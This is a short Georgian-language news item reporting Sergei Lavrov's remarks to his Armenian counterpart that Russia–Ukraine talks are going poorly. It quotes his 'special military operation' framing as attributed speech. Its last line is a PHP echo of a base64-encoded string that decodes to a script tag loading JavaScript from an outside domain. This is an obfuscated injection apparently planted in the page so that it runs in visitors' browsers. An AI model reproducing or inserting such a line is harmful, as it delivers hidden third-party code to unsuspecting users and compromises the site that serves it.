celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრმა სერგეი ლავროვმა, სომეხ კოლეგასთან შეხვედრის დროს განაცხადა, რომ რუსეთს და უკრაინას შორის მოლაპარაკებები მარტივად არ მიმდინარეობს.
 
ლავროვის თქმით, მოსკოვი შეეცდება უზრუნველყოს მოლაპარაკებების პროცესის ყველა ამოცანის შესრულება.
 
"ჩვენ რეგულარულად ვაცნობთ ჩვენს მეგობრებს სპეციალური სამხედრო ოპერაციის მიმდინარეობის შესახებ, რომელიც მიზნად ისახავს დონეცკისა და ლუგანსკის ოლქების მოსახლეობის დაცვას სამხედრო საფრთხისგან. ჩემს სომეხ კოლეგას გავუზიარე, თუ როგორ ვითარდება მოლაპარაკებების ფარგლებში კონტაქტები რუსეთისა და უკრაინის დელეგაციის წევრებს შორის. დიალოგი კარგად არ მიდის, თუმცა ჩვენ ვუზრუნველყოფთ, რომ ამ მოლაპარაკებების ფარგლებში დასახული ყველა ამოცანა შესრულდეს. დასავლეთმა რუსოფობიურ აურზაურში ეუთოს მინსკის ჯგუფის თანათავმჯდომარეების მექანიზმი გააუქმა," - განაცხადა სერგეი ლავროვმა. 
 
 
936
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");